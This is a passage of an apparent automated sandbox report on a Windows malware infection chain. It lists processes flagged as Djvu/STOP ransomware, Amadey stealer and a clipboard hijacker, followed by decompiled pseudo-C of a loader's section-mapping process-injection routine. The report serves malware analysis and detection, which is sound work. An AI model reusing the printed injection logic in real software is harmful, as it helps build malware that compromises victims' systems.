                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                  Target ID:37
                                                                                                  Start time:20:24:09
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\oldplayer.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\oldplayer.exe"
                                                                                                  Imagebase:0xcf0000
                                                                                                  File size:202752 bytes
                                                                                                  MD5 hash:A64A886A695ED5FB9273E73241FEC2F7
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000002.698247896.0000000000CF1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000000.689655040.0000000000CF1000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 96%, ReversingLabs

                                                                                                  Target ID:38
                                                                                                  Start time:20:24:09
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe"
                                                                                                  Imagebase:0xad0000
                                                                                                  File size:9728 bytes
                                                                                                  MD5 hash:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000026.00000002.692364725.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000026.00000002.692364725.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000026.00000002.692220584.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000026.00000002.692220584.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 88%, ReversingLabs

                                                                                                  Target ID:39
                                                                                                  Start time:20:24:10
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:4%
                                                                                                    Dynamic/Decrypted Code Coverage:61.2%
                                                                                                    Signature Coverage:34.1%
                                                                                                    Total number of Nodes:85
                                                                                                    Total number of Limit Nodes:11
                                                                                                    execution_graph 5698 40f9a0 5701 40f520 5698->5701 5700 40f9bb 5707 40f548 __write_nolock 5701->5707 5702 40f6bb GlobalAlloc 5708 40f700 5702->5708 5704 40f921 5712 40f330 LoadLibraryA 5704->5712 5706 40f935 5706->5700 5707->5702 5709 40f180 5708->5709 5710 40f1b2 VirtualProtect 5709->5710 5710->5704 5712->5706 5783 402d40 5784 402d65 5783->5784 5785 401932 8 API calls 5784->5785 5786 402f37 5784->5786 5785->5786 5827 401523 5828 401529 5827->5828 5829 4018d5 5828->5829 5830 401608 NtDuplicateObject 5828->5830 5830->5829 5831 401625 NtCreateSection 5830->5831 5832 4016a5 NtCreateSection 5831->5832 5833 40164b NtMapViewOfSection 5831->5833 5832->5829 5835 4016cf 5832->5835 5833->5832 5834 40166e NtMapViewOfSection 5833->5834 5834->5832 5836 40168c 5834->5836 5835->5829 5837 4016db NtMapViewOfSection 5835->5837 5836->5832 5837->5829 5838 401702 NtMapViewOfSection 5837->5838 5838->5829 5838->5835 5713 40b4e5 5714 40b4eb RtlEncodePointer 5713->5714 5714->5714 5715 40b505 5714->5715 5787 401749 5790 4016cf 5787->5790 5788 4016db NtMapViewOfSection 5789 401702 NtMapViewOfSection 5788->5789 5791 4018d5 5788->5791 5789->5790 5789->5791 5790->5787 5790->5788 5790->5791 5716 40ba6b 5719 40b8de 5716->5719 5720 40b8f2 5719->5720 5725 40cb61 5720->5725 5722 40cb61 __forcdecpt_l LCMapStringW 5724 40b91b 5722->5724 5723 40b8fe __forcdecpt_l 5723->5722 5726 40cb7f 5725->5726 5727 40cb6f 5725->5727 5729 40ca4c 5726->5729 5727->5723 5730 40ca61 5729->5730 5731 40ca6d 5730->5731 5733 409551 5730->5733 5731->5727 5734 409564 5733->5734 5737 40936a 5734->5737 5736 409585 5736->5731 5740 409388 __crtGetStringTypeA_stat 5737->5740 5738 4093e6 TranslatorGuardHandler __freea __crtGetStringTypeA_stat 5738->5736 5739 409453 LCMapStringW 5739->5738 5740->5738 5740->5739 5741 402e9b 5742 402ea1 5741->5742 5744 402f37 5742->5744 5745 401932 5742->5745 5746 401943 5745->5746 5747 401986 Sleep 5746->5747 5748 4019a1 5747->5748 5750 4019b2 5748->5750 5751 401558 5748->5751 5750->5744 5752 401567 5751->5752 5753 401608 NtDuplicateObject 5752->5753 5759 4018d5 5752->5759 5754 401625 NtCreateSection 5753->5754 5753->5759 5755 4016a5 NtCreateSection 5754->5755 5756 40164b NtMapViewOfSection 5754->5756 5758 4016cf 5755->5758 5755->5759 5756->5755 5757 40166e NtMapViewOfSection 5756->5757 5757->5755 5760 40168c 5757->5760 5758->5759 5761 4016db NtMapViewOfSection 5758->5761 5759->5750 5760->5755 5761->5759 5762 401702 NtMapViewOfSection 5761->5762 5762->5758 5762->5759 5822 402d7d 5823 402d83 5822->5823 5824 402deb 5822->5824 5825 401932 8 API calls 5824->5825 5826 402f37 5824->5826 5825->5826 5839 40193d 5840 40196a 5839->5840 5841 401986 Sleep 5840->5841 5842 4019a1 5841->5842 5843 4019b2 5842->5843 5844 401558 7 API calls 5842->5844 5844->5843

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 401558-4015b2 call 4011f5 12 4015b4 0->12 13 4015b7-4015bc 0->13 12->13 15 4015c2-4015d3 13->15 16 4018d7-4018df 13->16 20 4018d5 15->20 21 4015d9-401602 15->21 16->13 19 4018e4-40192f call 4011f5 16->19 20->19 21->20 28 401608-40161f NtDuplicateObject 21->28 28->20 30 401625-401649 NtCreateSection 28->30 32 4016a5-4016cb NtCreateSection 30->32 33 40164b-40166c NtMapViewOfSection 30->33 32->20 37 4016d1-4016d5 32->37 33->32 36 40166e-40168a NtMapViewOfSection 33->36 36->32 39 40168c-4016a2 36->39 37->20 40 4016db-4016fc NtMapViewOfSection 37->40 39->32 40->20 42 401702-40171e NtMapViewOfSection 40->42 42->20 45 401724-40174c call 401729 42->45 45->20 45->40
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                    				void* _v8;
                                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                                    				void* _v16;
                                                                                                    				void* _v20;
                                                                                                    				char _v44;
                                                                                                    				char _v52;
                                                                                                    				intOrPtr _v56;
                                                                                                    				long _v60;
                                                                                                    				char _v64;
                                                                                                    				void* _v68;
                                                                                                    				char _v72;
                                                                                                    				void* _v76;
                                                                                                    				char _v84;
                                                                                                    				char _v88;
                                                                                                    				char _v92;
                                                                                                    				intOrPtr _v96;
                                                                                                    				char _v100;
                                                                                                    				void* __edi;
                                                                                                    				intOrPtr _t87;
                                                                                                    				struct _EXCEPTION_RECORD _t90;
                                                                                                    				intOrPtr _t91;
                                                                                                    				struct _GUID _t97;
                                                                                                    				struct _GUID _t99;
                                                                                                    				long _t100;
                                                                                                    				PVOID* _t121;
                                                                                                    				PVOID* _t123;
                                                                                                    				intOrPtr _t127;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t183;
                                                                                                    				intOrPtr* _t184;
                                                                                                    				HANDLE* _t185;
                                                                                                    				HANDLE* _t186;
                                                                                                    				intOrPtr _t199;
                                                                                                    				void* _t200;
                                                                                                    				intOrPtr* _t201;
                                                                                                    				void* _t205;
                                                                                                    
                                                                                                    				_push(0x387);
                                                                                                    				_t201 = _t200 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t205);
                                                                                                    				_t127 = _a4;
                                                                                                    				_t176 = 0;
                                                                                                    				_v56 = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					_v56 = _v56 + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                                                                                                    					if(_t87 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				_v96 = _t87;
                                                                                                    				_t183 =  &_v100;
                                                                                                    				 *_t183 = _t176;
                                                                                                    				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
                                                                                                    				_t90 =  *_t183;
                                                                                                    				if(_t90 != 0) {
                                                                                                    					_t132 =  &_v52;
                                                                                                    					 *_t132 = _t90;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t184 =  &_v44;
                                                                                                    					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
                                                                                                    					 *_t184 = 0x18;
                                                                                                    					_push( &_v52);
                                                                                                    					_push(_t184);
                                                                                                    					_push(0x40);
                                                                                                    					_push( &_v20);
                                                                                                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
                                                                                                    						_v12 = _t176;
                                                                                                    						_t97 =  &_v84;
                                                                                                    						 *(_t97 + 4) = _t176;
                                                                                                    						 *_t97 = 0x5000;
                                                                                                    						_t185 =  &_v88;
                                                                                                    						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
                                                                                                    							_push(_v84);
                                                                                                    							_pop( *_t25);
                                                                                                    							_t121 =  &_v72;
                                                                                                    							 *_t121 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
                                                                                                    								_t123 =  &_v64;
                                                                                                    								 *_t123 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
                                                                                                    									_t199 = _v72;
                                                                                                    									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
                                                                                                    									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
                                                                                                    									_v12 = _v12 + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t99 =  &_v84;
                                                                                                    						 *(_t99 + 4) = _t176;
                                                                                                    						 *_t99 = _a12 + 0x10000;
                                                                                                    						_t186 =  &_v92;
                                                                                                    						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t100 != 0) goto L67;
                                                                                                    						 *_t100 =  *_t100 + _t100;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t91 =  *_t201;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t226);
                                                                                                    				return _t91;
                                                                                                    			}









































                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164b
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                                    • Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
                                                                                                    • Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                                    • Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 49 401564-4015b2 call 4011f5 59 4015b4 49->59 60 4015b7-4015bc 49->60 59->60 62 4015c2-4015d3 60->62 63 4018d7-4018df 60->63 67 4018d5 62->67 68 4015d9-401602 62->68 63->60 66 4018e4-40192f call 4011f5 63->66 67->66 68->67 75 401608-40161f NtDuplicateObject 68->75 75->67 77 401625-401649 NtCreateSection 75->77 79 4016a5-4016cb NtCreateSection 77->79 80 40164b-40166c NtMapViewOfSection 77->80 79->67 84 4016d1-4016d5 79->84 80->79 83 40166e-40168a NtMapViewOfSection 80->83 83->79 86 40168c-4016a2 83->86 84->67 87 4016db-4016fc NtMapViewOfSection 84->87 86->79 87->67 89 401702-40171e NtMapViewOfSection 87->89 89->67 92 401724-40174c call 401729 89->92 92->67 92->87
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00401564(void* __eax, void* __edx, void* __esi) {
                                                                                                    				intOrPtr _t89;
                                                                                                    				struct _EXCEPTION_RECORD _t92;
                                                                                                    				intOrPtr _t93;
                                                                                                    				struct _GUID _t99;
                                                                                                    				struct _GUID _t101;
                                                                                                    				long _t102;
                                                                                                    				PVOID* _t123;
                                                                                                    				PVOID* _t125;
                                                                                                    				intOrPtr _t129;
                                                                                                    				struct _EXCEPTION_RECORD* _t135;
                                                                                                    				void* _t179;
                                                                                                    				struct _EXCEPTION_RECORD _t180;
                                                                                                    				struct _EXCEPTION_RECORD* _t190;
                                                                                                    				intOrPtr* _t192;
                                                                                                    				HANDLE* _t193;
                                                                                                    				HANDLE* _t194;
                                                                                                    				void* _t207;
                                                                                                    				void* _t208;
                                                                                                    				void* _t210;
                                                                                                    				intOrPtr* _t211;
                                                                                                    				void* _t216;
                                                                                                    
                                                                                                    				_t216 = __eax + 0x15a4b8;
                                                                                                    				_push(0x387);
                                                                                                    				_t211 = _t210 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t179, _t216);
                                                                                                    				_t129 =  *((intOrPtr*)(_t208 + 8));
                                                                                                    				_t180 = 0;
                                                                                                    				 *((intOrPtr*)(_t208 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                                    					if(_t89 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
                                                                                                    				_t190 = _t208 - 0x60;
                                                                                                    				 *_t190 = _t180;
                                                                                                    				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
                                                                                                    				_t92 =  *_t190;
                                                                                                    				if(_t92 != 0) {
                                                                                                    					_t135 = _t208 - 0x30;
                                                                                                    					 *_t135 = _t92;
                                                                                                    					 *(_t135 + 4) = _t180;
                                                                                                    					_t192 = _t208 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
                                                                                                    					 *_t192 = 0x18;
                                                                                                    					_push(_t208 - 0x30);
                                                                                                    					_push(_t192);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t208 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
                                                                                                    						 *(_t208 - 8) = _t180;
                                                                                                    						_t99 = _t208 - 0x50;
                                                                                                    						 *(_t99 + 4) = _t180;
                                                                                                    						 *_t99 = 0x5000;
                                                                                                    						_t193 = _t208 - 0x54;
                                                                                                    						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
                                                                                                    							 *_t25 =  *(_t208 - 0x50);
                                                                                                    							_t123 = _t208 - 0x44;
                                                                                                    							 *_t123 = _t180;
                                                                                                    							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
                                                                                                    								_t125 = _t208 - 0x3c;
                                                                                                    								 *_t125 = _t180;
                                                                                                    								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
                                                                                                    									_t207 =  *(_t208 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
                                                                                                    									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
                                                                                                    									 *(_t208 - 8) =  *(_t208 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t101 = _t208 - 0x50;
                                                                                                    						 *(_t101 + 4) = _t180;
                                                                                                    						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
                                                                                                    						_t194 = _t208 - 0x58;
                                                                                                    						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
                                                                                                    						if (_t102 != 0) goto L66;
                                                                                                    						 *_t102 =  *_t102 + _t102;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t93 =  *_t211;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t180, _t237);
                                                                                                    				return _t93;
                                                                                                    			}
























                                                                                                    0x00401566
                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                                    • Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
                                                                                                    • Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                                    • Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 138 401577-4015b2 call 4011f5 145 4015b4 138->145 146 4015b7-4015bc 138->146 145->146 148 4015c2-4015d3 146->148 149 4018d7-4018df 146->149 153 4018d5 148->153 154 4015d9-401602 148->154 149->146 152 4018e4-40192f call 4011f5 149->152 153->152 154->153 161 401608-40161f NtDuplicateObject 154->161 161->153 163 401625-401649 NtCreateSection 161->163 165 4016a5-4016cb NtCreateSection 163->165 166 40164b-40166c NtMapViewOfSection 163->166 165->153 170 4016d1-4016d5 165->170 166->165 169 40166e-40168a NtMapViewOfSection 166->169 169->165 172 40168c-4016a2 169->172 170->153 173 4016db-4016fc NtMapViewOfSection 170->173 172->165 173->153 175 401702-40171e NtMapViewOfSection 173->175 175->153 178 401724-40174c call 401729 175->178 178->153 178->173
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E00401577() {
                                                                                                    				intOrPtr _t86;
                                                                                                    				struct _EXCEPTION_RECORD _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				struct _GUID _t96;
                                                                                                    				struct _GUID _t98;
                                                                                                    				long _t99;
                                                                                                    				PVOID* _t120;
                                                                                                    				PVOID* _t122;
                                                                                                    				intOrPtr _t126;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t184;
                                                                                                    				intOrPtr* _t186;
                                                                                                    				HANDLE* _t187;
